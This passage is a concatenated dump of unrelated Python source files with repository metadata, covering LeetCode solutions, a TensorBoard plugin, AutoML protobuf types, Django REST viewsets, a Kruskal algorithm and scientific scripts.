self._master.start_loop()
def stop(self) -> None:
self._master.stop_loop()
class PurpleDigitalClock(Clock):
"""Represent concrete purple digital clock."""
def __init__(self, master: Window, name: str) -> None:
self._clock: Clock = DigitalClock(
name=name,
time=ClockTime(),
master=master,
widget=PurpleUIWidget(master)
)
def start(self) -> None:
self._clock.start()
def stop(self) -> None:
self._clock.stop()
class ClockRunner(Runner):
"""Main clock runner."""
def __init__(self, clock: Clock) -> None:
self._clock: Clock = clock
def perform(self):
"""Start the clock functioning."""
self._clock.start()
|
[
"vyahello@gmail.com"
] |
vyahello@gmail.com
|
9889d3e62066d82b07468267398eeaee10b1399b
|
bd75c7ec55b78ef189f57596520744f82ec73073
|
/Swap Nodes in Pairs.py
|
06df07c8a141d9b99481b27baa91b0459c330f30
|
[] |
no_license
|
GaoLF/LeetCode-PY
|
17058ac0743403292559f9b83a20bf79d89e33f6
|
ccd294cfe0c228a21518d077d1aa01e510930ea3
|
refs/heads/master
| 2021-01-23T02:24:05.940132
| 2015-07-22T13:44:01
| 2015-07-22T13:44:01
| 38,248,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,085
|
py
|
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
# @param {ListNode} head
# @return {ListNode}
def swapPairs(self, head):
if not head:
return head
iter = head
temp = head
while iter and iter.next:
temp_node = temp.next
if temp == head:
temp_node = iter.next.next
head = head.next
head.next = iter
head.next.next = temp_node
iter = temp_node
else:
temp_node = iter.next.next
temp.next = iter.next
iter.next.next = iter
iter.next = temp_node
temp = iter
iter = iter.next
return head
A = Solution()
a = ListNode(1)
b = ListNode(2)
c = ListNode(3)
d = ListNode(4)
e = ListNode(5)
f = ListNode(6)
#a.next = b
b.next = c
c.next = d
d.next = e
e.next = f
x = A.swapPairs(a)
while x:
print x.val
x = x.next
|
[
"gaolongfei@pku.edu.cn"
] |
gaolongfei@pku.edu.cn
|
16ae4e8715304dfc152331ccbd298ad4158b5b5b
|
113d34bc3a8a9d43c770fd41ee327fd3cbca67dd
|
/Python3/Path in the matrix.py
|
24465fdc0b35da89dd603edf323da1f75d640c77
|
[] |
no_license
|
liuyuhang791034063/LeetCode
|
2b5d3413abc3ed6f8fccf35f39454e2cfd9807b1
|
b613718bf69982535b7c3c9f329a47d5741d8a9e
|
refs/heads/master
| 2020-03-29T01:58:25.836162
| 2019-07-27T04:33:06
| 2019-07-27T04:33:06
| 149,415,780
| 12
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,553
|
py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: Path in the matrix
Description:
Author: God
date: 2018/12/3
-------------------------------------------------
Change Activity: 2018/12/3
-------------------------------------------------
"""
__author__ = 'God'
class Solution:
def hasPath(self, matrix, rows, cols, path):
self.col, self.row = cols, rows
matrix = [list(matrix[cols * i:cols * i + cols]) for i in range(rows)]
for i in range(rows):
for j in range(cols):
if matrix[i][j] == path[0]:
self.b = False
self.search(matrix, path[1:], [(i, j)], i, j)
if self.b:
return True
return False
def search(self, matrix, word, exists, i, j):
if word == '':
self.b = True
return
if j != 0 and (i, j-1) not in exists and matrix[i][j-1] == word[0]:
self.search(matrix, word[1:], exists+[(i, j-1)], i, j-1)
if i != 0 and (i-1, j) not in exists and matrix[i-1][j] == word[0]:
self.search(matrix, word[1:], exists+[(i-1, j)], i-1, j)
if j != self.col - 1 and (i, j+1) not in exists and matrix[i][j+1] == word[0]:
self.search(matrix, word[1:], exists+[(i, j+1)], i, j+1)
if i != self.row - 1 and (i+1, j) not in exists and matrix[i+1][j] == word[0]:
self.search(matrix, word[1:], exists+[(i+1, j)], i+1, j)
|
[
"liuyuhang791034063@qq.com"
] |
liuyuhang791034063@qq.com
|
0e602feaaebaabffc917cb62b6c5e9a85335fffa
|
f312fcd24d94be8b32e2d1e50643b01c619aa23b
|
/tensorboard/plugins/wit_redirect/wit_redirect_plugin.py
|
58bcd4d9cfb12ad96adb029933e9ef31ab6a7ad5
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/tensorboard
|
bf316fc5d47f78ef980dd2106c99207892a508d5
|
5961c76dca0fb9bb40d146f5ce13834ac29d8ddb
|
refs/heads/master
| 2023-09-03T23:59:03.264261
| 2023-08-30T22:24:07
| 2023-08-30T22:24:07
| 91,379,993
| 6,766
| 2,063
|
Apache-2.0
| 2023-09-14T20:55:56
| 2017-05-15T20:08:07
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 1,682
|
py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Plugin that only displays a message with installation instructions."""
from tensorboard.plugins import base_plugin
class WITRedirectPluginLoader(base_plugin.TBLoader):
"""Load the redirect notice iff the dynamic plugin is unavailable."""
def load(self, context):
try:
import tensorboard_plugin_wit # noqa: F401
# If we successfully load the dynamic plugin, don't show
# this redirect plugin at all.
return None
except ImportError:
return _WITRedirectPlugin(context)
class _WITRedirectPlugin(base_plugin.TBPlugin):
"""Redirect notice pointing users to the new dynamic LIT plugin."""
plugin_name = "wit_redirect"
def get_plugin_apps(self):
return {}
def is_active(self):
return False
def frontend_metadata(self):
return base_plugin.FrontendMetadata(
element_name="tf-wit-redirect-dashboard",
tab_name="What-If Tool",
)
|
[
"noreply@github.com"
] |
tensorflow.noreply@github.com
|
13205a31e87c1b4daed148c5469c509a8f892bfa
|
ff810e6722caab8c0affcf97151f3c8fc332b6a1
|
/muddery/worlddata/dao/event_mapper.py
|
cabd7a3f72345ee671298bcbd1c1df5684fb79c3
|
[
"BSD-3-Clause"
] |
permissive
|
tuchang/muddery
|
014b69daf33a0042d341b403acc9939ca5e3ef11
|
bab4b86c5fe4259b7c22a97d54e4249aab47f99e
|
refs/heads/master
| 2020-04-26T23:38:40.383523
| 2019-01-30T14:54:07
| 2019-01-30T14:54:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
"""
Query and deal common tables.
"""
from __future__ import print_function
from evennia.utils import logger
from django.db import transaction
from django.apps import apps
from django.conf import settings
from muddery.utils import defines
from muddery.worlddata.dao.common_mapper_base import ObjectsMapper
def get_object_event(object_key):
"""
Get object's event.
"""
model = apps.get_model(settings.WORLD_DATA_APP, "event_data")
return model.objects.filter(trigger_obj=object_key)
|
[
"luyijun999@gmail.com"
] |
luyijun999@gmail.com
|
8a60ef7df7b4593fe623e1cd3e266dec4a72850c
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/triangle_20200625195423.py
|
f43a71703b57e579886f578c35c9e086ac7dbb53
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
# this function is meant to print a triangle
def triangle():
# outer loop is for the rows --> 4
for i in range(0,4):
# inner loop is for colums --> 4
for j in range(0,i+1):
print('*')
#
triangle()
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
0efe069b4fa0143a1c876e9da6b2664df329c8ff
|
8821c29949644faab3023f492bf615fe1cab4049
|
/liquidluck/writers/extends.py
|
dc50589efe1785f5f245c316b5bf36a2d61828f3
|
[] |
no_license
|
loopwerk/liquidluck
|
c29bf2cc70343418dbe6a4dd3b55c9ec96e1f503
|
d2c41f0b7cddabd3036bab514cf5ecbcc57becea
|
refs/heads/main
| 2023-02-26T15:41:06.173164
| 2021-02-02T16:32:32
| 2021-02-02T16:32:32
| 335,299,233
| 1
| 0
| null | 2021-02-02T13:32:14
| 2021-02-02T13:32:14
| null |
UTF-8
|
Python
| false
| false
| 2,165
|
py
|
#!/usr/bin/env python
"""Extends of the core writers
"""
import os
from liquidluck.options import g, settings
from liquidluck.writers.base import BaseWriter
from liquidluck.writers.base import get_post_destination
class PostWriter(BaseWriter):
"""Replace the default post writer, edit settings::
writers = {
'post': 'liquidluck.writers.exends.PostWriter',
}
Get related posts in template with::
- {{post.relation.newer}}
- {{post.relation.older}}
- {% for item in post.relation.related %}
"""
writer_name = 'post'
def __init__(self):
self._template = self.get('post_template', 'post.html')
def start(self):
for index, post in enumerate(g.public_posts):
template = post.template or self._template
relation = self._get_relations(post, index)
post.relation = relation
self.render({'post': post}, template, self._dest_of(post))
for post in g.secure_posts:
post.relation = None
self.render({'post': post}, template, self._dest_of(post))
def _dest_of(self, post):
dest = get_post_destination(post, settings.config['permalink'])
return os.path.join(g.output_directory, dest)
def _get_relations(self, post, index):
total = len(g.public_posts)
newer = None
if index > 0:
newer = g.public_posts[index - 1]
older = None
if index < total - 1:
older = g.public_posts[index + 1]
def get_related_by_tags():
tags = set(post.tags)
base = len(post.tags)
for p in g.public_posts:
prior = len(tags - set(p.tags))
if prior < base and p.title != post.title:
p.related_priority = base - prior
yield p
related = sorted(get_related_by_tags(),
key=lambda o: o.related_priority,
reverse=True)
relation = {
'newer': newer,
'older': older,
'related': related[:4],
}
return relation
|
[
"lepture@me.com"
] |
lepture@me.com
|
df3dd0c6444826ae7b47594b45a3af13c9367411
|
eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7
|
/google/cloud/automl/v1beta1/automl-v1beta1-py/google/cloud/automl_v1beta1/types/text.py
|
4cfbeec4414685c6289c3c27575e043c78d1d454
|
[
"Apache-2.0"
] |
permissive
|
Tryweirder/googleapis-gen
|
2e5daf46574c3af3d448f1177eaebe809100c346
|
45d8e9377379f9d1d4e166e80415a8c1737f284d
|
refs/heads/master
| 2023-04-05T06:30:04.726589
| 2021-04-13T23:35:20
| 2021-04-13T23:35:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,303
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.automl_v1beta1.types import classification
__protobuf__ = proto.module(
package='google.cloud.automl.v1beta1',
manifest={
'TextClassificationDatasetMetadata',
'TextClassificationModelMetadata',
'TextExtractionDatasetMetadata',
'TextExtractionModelMetadata',
'TextSentimentDatasetMetadata',
'TextSentimentModelMetadata',
},
)
class TextClassificationDatasetMetadata(proto.Message):
r"""Dataset metadata for classification.
Attributes:
classification_type (google.cloud.automl_v1beta1.types.ClassificationType):
Required. Type of the classification problem.
"""
classification_type = proto.Field(proto.ENUM, number=1,
enum=classification.ClassificationType,
)
class TextClassificationModelMetadata(proto.Message):
r"""Model metadata that is specific to text classification.
Attributes:
classification_type (google.cloud.automl_v1beta1.types.ClassificationType):
Output only. Classification type of the
dataset used to train this model.
"""
classification_type = proto.Field(proto.ENUM, number=3,
enum=classification.ClassificationType,
)
class TextExtractionDatasetMetadata(proto.Message):
r"""Dataset metadata that is specific to text extraction"""
class TextExtractionModelMetadata(proto.Message):
r"""Model metadata that is specific to text extraction.
Attributes:
model_hint (str):
Indicates the scope of model use case.
- ``default``: Use to train a general text extraction
model. Default value.
- ``health_care``: Use to train a text extraction model
that is tuned for healthcare applications.
"""
model_hint = proto.Field(proto.STRING, number=3)
class TextSentimentDatasetMetadata(proto.Message):
r"""Dataset metadata for text sentiment.
Attributes:
sentiment_max (int):
Required. A sentiment is expressed as an integer ordinal,
where higher value means a more positive sentiment. The
range of sentiments that will be used is between 0 and
sentiment_max (inclusive on both ends), and all the values
in the range must be represented in the dataset before a
model can be created. sentiment_max value must be between 1
and 10 (inclusive).
"""
sentiment_max = proto.Field(proto.INT32, number=1)
class TextSentimentModelMetadata(proto.Message):
r"""Model metadata that is specific to text sentiment."""
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
70010e56865e6859e5fb7ce76d3db89396781ae3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02404/s524653076.py
|
6b28671655af949d1e273a3f672228e10e89b441
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
while True:
num = list(map(int,input().split()))
if(num[0] == 0 and num[1] == 0): break
else:
flag = False
for i in range(num[0]):
str = ""
if(i == 0 or i == num[0]-1): flag=True
else: flag=False
for j in range(num[1]):
if(j == 0 or j == num[1]-1 or flag):
str = str + "#"
else:
str = str + "."
print(str)
print()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
217781305f8edabd2f783fbd2dfab45ad641bc8b
|
88b063ec8e543e6f62f3adac6be214128a984548
|
/backend/chat/api/v1/viewsets.py
|
f866d1b60c17b260c5991567c246fc3286766130
|
[] |
no_license
|
crowdbotics-apps/chat-app-28513
|
6939d1da6c53f6d44786b4f822b4fb4c1fedd57f
|
129f56f533f8f3076fdcfcfe3180942e5890f9f2
|
refs/heads/master
| 2023-06-06T17:26:04.090136
| 2021-07-06T23:23:40
| 2021-07-06T23:23:40
| 383,620,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
from rest_framework import authentication
from chat.models import (
Message,
ThreadMember,
MessageAction,
ThreadAction,
ForwardedMessage,
Thread,
)
from .serializers import (
MessageSerializer,
ThreadMemberSerializer,
MessageActionSerializer,
ThreadActionSerializer,
ForwardedMessageSerializer,
ThreadSerializer,
)
from rest_framework import viewsets
class ForwardedMessageViewSet(viewsets.ModelViewSet):
serializer_class = ForwardedMessageSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = ForwardedMessage.objects.all()
class ThreadActionViewSet(viewsets.ModelViewSet):
serializer_class = ThreadActionSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = ThreadAction.objects.all()
class MessageActionViewSet(viewsets.ModelViewSet):
serializer_class = MessageActionSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = MessageAction.objects.all()
class ThreadViewSet(viewsets.ModelViewSet):
serializer_class = ThreadSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Thread.objects.all()
class MessageViewSet(viewsets.ModelViewSet):
serializer_class = MessageSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Message.objects.all()
class ThreadMemberViewSet(viewsets.ModelViewSet):
serializer_class = ThreadMemberSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = ThreadMember.objects.all()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
726f56c748b2aa68e9e184b243ff36945ab2243e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02421/s282455109.py
|
e0be63d9b3954f9063104c79b5c40180297004d4
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
point_a,point_b = 0,0
for i in range(int(input())):
k =[]
a,b = input().split()
k = [[i,j] for i,j in zip(a,b) if i != j]
if k == []:
if len(a) < len(b):
point_b+=3
elif len(a) > len(b):
point_a += 3
else:
point_a+=1
point_b+=1
elif ord(k[0][0]) < ord(k[0][1]):
point_b += 3
else :
point_a += 3
print(point_a,point_b)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
e5cb1c5a23fb4af6846b5bf7dc61c210c9fbfe4d
|
b68115ac6cd996c1a09d70c2cf7158715c125aae
|
/simulation/tests/context.py
|
542253303d40ec9076d7a91ffa82a0c73939aaa3
|
[] |
no_license
|
joakim-hove/fmu_storage
|
3a71d7521818658a252e90a3b08c32810a86d544
|
c02feb69493a9e17592b1b5e3cf201c559b20bdf
|
refs/heads/master
| 2021-08-28T06:54:59.291006
| 2017-12-11T13:51:36
| 2017-12-11T13:51:36
| 103,049,778
| 0
| 2
| null | 2017-09-14T13:14:26
| 2017-09-10T17:53:27
|
Python
|
UTF-8
|
Python
| false
| false
| 2,918
|
py
|
import getpass
import os
import grp
import random
from ecl.ecl import EclGrid, EclGridGenerator, EclSum, openFortIO, EclFile
from ecl.test import TestAreaContext
from ecl.test.ecl_mock import createEclSum
from simulation.models import *
def fopr(days):
return days
def random_fopr(days):
return fopr(days) * random.random( )
def fopt(days):
return days
def random_fopt(days):
return fopt(days) * random.random()
def fgpt(days):
if days < 50:
return days
else:
return 100 - days
def random_fgpt(days):
return fgpt(days) * random.random()
class TestContext(object):
def __init__(self):
length = 100
case = createEclSum("CASE" , [("FOPT", None , 0) , ("FOPR" , None , 0), ("FGPT" , None , 0)],
sim_length_days = length,
num_report_step = 10,
num_mini_step = 10,
func_table = {"FOPT" : fopt,
"FOPR" : fopr ,
"FGPT" : fgpt })
self.user = getpass.getuser()
self.group = grp.getgrgid( os.getgid( ) )[0]
self.case = case
with TestAreaContext("summary"):
case.fwrite( )
self.summary = Summary.create( "CASE.SMSPEC" , "CASE.UNSMRY" , self.group )
self.simulation = Simulation.create( summary = self.summary, parameters = [("CPARAM1", 100), ("CPARAM2", 200)] )
self.grid = EclGridGenerator.create_rectangular( (10,10,10),(1,1,1) )
@classmethod
def create_INIT(cls):
ecl_kw = EclKW(1000 , "PORV" , EclDataType.ECL_FLOAT )
with openFortIO("CASE.INIT", FortIO.WRITE_MODE) as f:
ecl_kw.fwrite( f )
return EclFile( "CASE.INIT" )
@classmethod
def create_UNRST(cls):
ecl_kw = EclKW(1000 , "PRESSURE" , EclDataType.ECL_FLOAT )
with openFortIO("CASE.UNRST", FortIO.WRITE_MODE) as f:
ecl_kw.fwrite( f )
return EclFile( "CASE.UNRST" )
@classmethod
def random_simulation(cls):
length = 100
case = createEclSum("CASE" , [("FOPT", None , 0) , ("FOPR" , None , 0), ("FGPT" , None , 0)],
sim_length_days = length,
num_report_step = 10,
num_mini_step = 10,
func_table = {"FOPT" : random_fopt,
"FOPR" : random_fopr ,
"FGPT" : random_fgpt })
group = grp.getgrgid( os.getgid( ) )[0]
with TestAreaContext("summary"):
case.fwrite( )
summary_case = Summary.create( "CASE.SMSPEC" , "CASE.UNSMRY" , group )
return Simulation.create( summary = summary_case, parameters = [("CPARAM1", 100*random.random()), ("CPARAM2", 200*random.random())] )
|
[
"joakim.hove@gmail.com"
] |
joakim.hove@gmail.com
|
28071d902234225339df9863437a44aa01511de6
|
6cc50a15672155f7d66e88830ad1baec6a061077
|
/processing/legacy/anisotropy/random_trials/grid_test/submitter.py
|
237c124558f1838e5cf2d1f6b45d2c356f636c95
|
[
"MIT"
] |
permissive
|
jrbourbeau/cr-composition
|
16b29c672b2d1c8d75c1c45e35fe6bb60b53ffe2
|
e9efb4b713492aaf544b5dd8bb67280d4f108056
|
refs/heads/master
| 2020-06-24T21:48:21.784277
| 2018-11-01T21:30:56
| 2018-11-01T21:30:56
| 74,618,907
| 0
| 1
|
MIT
| 2018-08-23T21:01:03
| 2016-11-23T22:31:01
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,237
|
py
|
#!/usr/bin/env python
import os
import pycondor
import comptools as comp
if __name__ == "__main__":
# Define output directories
error = os.path.join(comp.paths.condor_data_dir, 'grid_test/error')
output = os.path.join(comp.paths.condor_data_dir, 'grid_test/output')
log = os.path.join(comp.paths.condor_scratch_dir, 'grid_test/log')
submit = os.path.join(comp.paths.condor_scratch_dir, 'grid_test/submit')
# Define path to executables
job_ex = os.path.abspath('test_script.py')
# Extra lines for submitting to the open science grid
extra_lines = ['Requirements = HAS_CVMFS_icecube_opensciencegrid_org',
'use_x509userproxy=true',
'should_transfer_files = YES',
'when_to_transfer_output = ON_EXIT']
grid = 'gsiftp://gridftp-users.icecube.wisc.edu'
# Create Dagman instance
dag_name = 'test_dag'
dagman = pycondor.Dagman(dag_name, submit=submit, verbose=1)
job_name = 'test_job'
job = pycondor.Job(job_name, job_ex, error=error, output=output,
log=log, submit=submit, extra_lines=extra_lines,
verbose=1)
dagman.add_job(job)
dagman.build_submit(fancyname=True)
|
[
"jrbourbeau@gmail.com"
] |
jrbourbeau@gmail.com
|
c35d40a6aaaa6fe00d05db758d350f86d9bc8b5d
|
7bcb0b7f721c8fa31da7574f13ed0056127715b3
|
/src/apps/bi/kruskals.py
|
5a6e72b1e0f1a21c431315fa0eb2abb11ade3fbc
|
[] |
no_license
|
simonchapman1986/ripe
|
09eb9452ea16730c105c452eefb6a6791c1b4a69
|
c129da2249b5f75015f528e4056e9a2957b7d884
|
refs/heads/master
| 2022-07-22T05:15:38.485619
| 2016-01-15T12:53:43
| 2016-01-15T12:53:43
| 49,718,671
| 1
| 0
| null | 2022-07-07T22:50:50
| 2016-01-15T12:53:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,537
|
py
|
__author__ = 'simon'
parent = dict()
rank = dict()
def make_set(vertice):
parent[vertice] = vertice
rank[vertice] = 0
def find(vertice):
if parent[vertice] != vertice:
parent[vertice] = find(parent[vertice])
return parent[vertice]
def union(vertice1, vertice2):
root1 = find(vertice1)
root2 = find(vertice2)
if root1 != root2:
if rank[root1] > rank[root2]:
parent[root2] = root1
else:
parent[root1] = root2
if rank[root1] == rank[root2]: rank[root2] += 1
def kruskal(graph):
for vertice in graph['vertices']:
make_set(vertice)
minimum_spanning_tree = set()
edges = list(graph['edges'])
edges.sort()
for edge in edges:
weight, vertice1, vertice2 = edge
if find(vertice1) != find(vertice2):
union(vertice1, vertice2)
minimum_spanning_tree.add(edge)
return minimum_spanning_tree
def example():
"""
>>> graph = {\
'vertices': ['A', 'B', 'C', 'D', 'E', 'F'],\
'edges': set([\
(1, 'A', 'B'),\
(5, 'A', 'C'),\
(3, 'A', 'D'),\
(4, 'B', 'C'),\
(2, 'B', 'D'),\
(1, 'C', 'D'),\
])\
}
>>> minimum_spanning_tree = set([\
(1, 'A', 'B'),\
(2, 'B', 'D'),\
(1, 'C', 'D'),\
])
>>> print bool(kruskal(graph) == minimum_spanning_tree)
True
"""
pass
|
[
"simon-ch@moving-picture.com"
] |
simon-ch@moving-picture.com
|
6fc23d15c1c3ed67d9789862a4419cf73d03b598
|
556f9c2db9c88120dc6dc7bc4280935db78e3eaa
|
/scripts/test_zero.py
|
c28139a20225537e6deb1324f888d975b27f2fee
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
BlockResearchGroup/compas_ags
|
55dde6a2755c644b484767c8c359f6bfe68531a5
|
4507ff09be1a881d3f3520bc465a9dcda52b42ed
|
refs/heads/main
| 2023-04-11T04:43:50.850869
| 2022-11-17T10:46:23
| 2022-11-17T10:46:23
| 113,161,567
| 13
| 5
|
MIT
| 2022-11-17T10:35:43
| 2017-12-05T09:31:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,327
|
py
|
import compas_ags
from compas_ags.diagrams import FormGraph
from compas_ags.diagrams import FormDiagram
from compas_ags.diagrams import ForceDiagram
# from compas_ags.ags import graphstatics
from compas_ags.viewers import Viewer
from compas.rpc import Proxy
graphstatics = Proxy('compas_ags.ags.graphstatics')
# this file has unloaded, 2-valent nodes
# they will be removed automatically
# and the result renumbered
FILE = compas_ags.get('debugging/zero.obj')
graph = FormGraph.from_obj(FILE)
form = FormDiagram.from_graph(graph)
force = ForceDiagram.from_formdiagram(form)
# fix the supports
form.vertices_attribute('is_fixed', True, [8, 7])
# set the loads
form.edge_force((0, 1), +10.0)
form.edge_force((2, 3), +10.0)
form.edge_force((4, 5), +10.0)
# # compute initial form and force diagrams
# graphstatics.form_update_q_from_qind(form)
# graphstatics.force_update_from_form(force, form)
# compute initial form and force diagrams
form.data = graphstatics.form_update_q_from_qind_proxy(form.data)
force.data = graphstatics.force_update_from_form_proxy(force.data, form.data)
# change the geometry of the force diagram
force.vertex_attribute(6, 'x', force.vertex_attribute(8, 'x'))
force.vertex_attribute(9, 'x', force.vertex_attribute(10, 'x'))
force.vertex_attributes(7, 'xyz', force.vertex_attributes(6, 'xyz'))
force.vertex_attributes(11, 'xyz', force.vertex_attributes(9, 'xyz'))
# # change the depth of the structure
# force.vertices_attribute('x', 20, [6, 7, 8, 9, 10, 11])
# fix some of the nodes in the from diagram
# to constraint the problem to a single solution
form.vertices_attribute('is_fixed', True, [0, 2, 5])
# # update the form diagram
# graphstatics.form_update_from_force(form, force)
# update the form diagram
form.data = graphstatics.form_update_from_force_proxy(form.data, force.data)
# ==============================================================================
# Visualize
# ==============================================================================
viewer = Viewer(form, force, delay_setup=False, figsize=(12, 7.5))
viewer.draw_form(
vertexsize=0.15,
vertexcolor={key: '#000000' for key in (8, 7)},
vertexlabel={key: key for key in form.vertices()})
viewer.draw_force(
vertexsize=0.15,
vertexlabel={key: key for key in force.vertices()})
viewer.show()
|
[
"vanmelet@ethz.ch"
] |
vanmelet@ethz.ch
|
1b1047863ca9ab109e3bf32a674b4f7077fcfb6d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_136/1892.py
|
5fc6c54ef1e3222a84986cd7b64701be7742ba30
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
INITIAL_RATE = 2
class Case(object):
def __init__(self,C,F,X):
self.C = C
self.F = F
self.X = X
def solve(self):
time = self.X/INITIAL_RATE
return self.__solve_in_loop(INITIAL_RATE, time,0)
def __solve_in_loop(self,last_rate,last_time,overhead):
while (True):
time_to_farm = self.C/last_rate + overhead
new_rate = last_rate + self.F
new_time = time_to_farm + self.X/new_rate
if new_time >= last_time:
return last_time
last_time = new_time
last_rate = new_rate
overhead = time_to_farm
def parse_stdin():
n = int(raw_input())
cases = []
for i in xrange(n):
c = [float(x) for x in raw_input().split(' ')]
cases.append(Case(c[0],c[1],c[2]))
return cases
def main():
cases = parse_stdin()
i = 1
for c in cases:
print 'Case #{:d}: {:3.7f}'.format(i, c.solve())
i += 1
if __name__ == '__main__':
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
b4d0a06a96fa7688f6cf7f0e79de64a4065cf646
|
c0feb8693883e4b29096ad45b6b2113b7cad69ef
|
/supervised_learning/0x03-optimization/0-main.py
|
dcbea35b2e1336070660c73f686a5451c7af267c
|
[] |
no_license
|
vandeldiegoc/holbertonschool-machine_learning
|
905977a15dbb59753115936215a870fa0f46f52e
|
bda9efa60075afa834433ff1b5179db80f2487ae
|
refs/heads/main
| 2023-07-06T23:28:59.393284
| 2021-08-10T21:58:40
| 2021-08-10T21:58:40
| 318,391,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
#/usr/bin/env python3
import numpy as np
normalization_constants = __import__('0-norm_constants').normalization_constants
if __name__ == '__main__':
np.random.seed(0)
a = np.random.normal(0, 2, size=(100, 1))
b = np.random.normal(2, 1, size=(100, 1))
c = np.random.normal(-3, 10, size=(100, 1))
X = np.concatenate((a, b, c), axis=1)
m, s = normalization_constants(X)
print(m)
print(s)
|
[
"vandeldiegoc@gmail.com"
] |
vandeldiegoc@gmail.com
|
939ef16942fc3121165f9df42f9a4b943a6b7273
|
7ec38beb6f041319916390ee92876678412b30f7
|
/src/leecode/array_medium_1282(2).py
|
74ad89bcac3387e7faae9e44a1009212c7d51539
|
[] |
no_license
|
hopensic/LearnPython
|
3570e212a1931d4dad65b64ecdd24414daf51c73
|
f735b5d865789843f06a623a4006f8883d6d1ae0
|
refs/heads/master
| 2022-02-18T23:11:30.663902
| 2022-02-12T17:51:56
| 2022-02-12T17:51:56
| 218,924,551
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 367
|
py
|
from collections import defaultdict
class Solution:
def groupThePeople(self, groupSizes):
count = defaultdict(list)
for i, size in enumerate(groupSizes):
count[size].append(i)
return [l[i:i + s] for s, l in count.items() for i in range(0, len(l), s)]
lst = [3, 3, 3, 3, 3, 1, 3]
s = Solution()
print(s.groupThePeople(lst))
|
[
"hopensic@gmail.com"
] |
hopensic@gmail.com
|
cd967ebaafe8d50ba8eb76a9166a6187a6d13a31
|
